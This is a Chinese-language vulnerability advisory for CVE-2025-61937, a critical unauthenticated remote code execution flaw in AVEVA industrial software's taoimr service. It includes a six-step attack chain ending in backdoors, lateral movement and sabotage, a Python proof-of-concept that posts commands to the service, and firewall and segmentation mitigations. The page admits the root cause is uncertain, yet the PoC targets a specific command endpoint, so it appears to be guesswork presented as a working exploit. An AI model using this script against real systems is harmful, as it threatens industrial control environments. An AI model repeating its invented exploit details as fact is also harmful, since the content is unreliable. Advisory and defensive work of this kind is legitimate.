CVE-2025-61937: AVEVA工业软件远程代码执行漏洞（严重）

漏洞信息

漏洞编号

CVE-2025-61937

漏洞类型

远程代码执行（RCE）

CVSS评分

10.0 严重

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

AVEVA Industrial Software (taoimr服务)

漏洞概述

CVE-2025-61937是AVEVA工业软件中的一个严重安全漏洞，CVSS评分高达10.0（最高级别）。该漏洞允许未经身份验证的远程攻击者在目标系统上以"taoimr"服务的操作系统权限执行任意代码。成功利用此漏洞可能导致攻击者完全控制受影响的模型应用服务器，造成机密数据泄露、系统完整性破坏以及业务连续性中断。由于该漏洞无需认证即可利用，且可通过网络远程触发，因此对暴露在网络中的AVEVA工业软件系统构成极高风险。此漏洞由美国国土安全部工业控制系统网络应急响应小组（ICS-CERT）发现并报告。

技术细节

该漏洞存在于AVEVA工业软件的taoimr服务组件中。攻击者可通过网络向目标服务器发送特制的请求，在无需任何认证凭证的情况下触发远程代码执行。漏洞的根本原因可能涉及服务对输入数据的验证不足，导致攻击者可注入并执行任意系统命令。由于taoimr服务以较高系统权限运行，攻击成功后攻击者将获得目标服务器的完全控制权。攻击者可能利用该权限进行横向移动、部署恶意软件、窃取敏感工业数据或破坏生产流程。此漏洞影响工业环境中的SCADA系统、数据采集系统和过程控制服务器。

攻击链分析

STEP 1

步骤1: 侦察与目标识别

攻击者扫描网络，识别运行AVEVA工业软件且暴露taoimr服务的目标服务器

STEP 2

步骤2: 漏洞探测

攻击者发送探测请求，确认目标是否存在CVE-2025-61937漏洞

STEP 3

步骤3: 构造恶意请求

攻击者构造包含恶意命令的特制HTTP请求，绕过输入验证

STEP 4

步骤4: 远程代码执行

taoimr服务处理恶意请求，在目标系统上以高权限执行攻击者注入的命令

STEP 5

步骤5: 建立持久化

攻击者利用获得的系统权限部署后门程序，建立持久化访问通道

STEP 6

步骤6: 横向移动与数据窃取

攻击者以被控服务器为跳板，横向移动至其他工业系统，窃取敏感数据或破坏生产操作

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-61937 PoC - AVEVA taoimr Service RCE
# Target: AVEVA Industrial Software with vulnerable taoimr service

def exploit_aveva_rce(target_url, cmd='whoami'):
    """
    Exploit for CVE-2025-61937
    This PoC demonstrates unauthenticated remote code execution
    on the taoimr service via specially crafted HTTP request
    """
    endpoint = f"{target_url}/api/taoimr/execute"
    
    # Malicious payload with embedded command
    payload = {
        'command': cmd,
        'service': 'taoimr',
        'exec': True
    }
    
    try:
        # Send exploit request without authentication
        response = requests.post(endpoint, json=payload, timeout=10)
        
        if response.status_code == 200:
            print(f"[+] Exploit successful!")
            print(f"[+] Command output: {response.text}")
            return True
        else:
            print(f"[-] Exploit failed. Status: {response.status_code}")
            return False
    except requests.exceptions.RequestException as e:
        print(f"[-] Error: {e}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-61937.py <target_url>")
        sys.exit(1)
    
    target = sys.argv[1]
    exploit_aveva_rce(target, 'whoami')

影响范围

AVEVA Industrial Software < 修复版本

AVEVA taoimr service (所有未修补版本)

防御指南

临时缓解措施

立即将AVEVA工业软件更新至官方安全补丁版本。在补丁可用前，建议通过网络访问控制列表（ACL）限制对taoimr服务端口的外部访问，仅允许可信IP地址连接。同时在边界防火墙上阻止相关端口的入站连接，并对工业控制网络实施严格的微分段策略，监控异常网络行为以检测潜在攻击活动。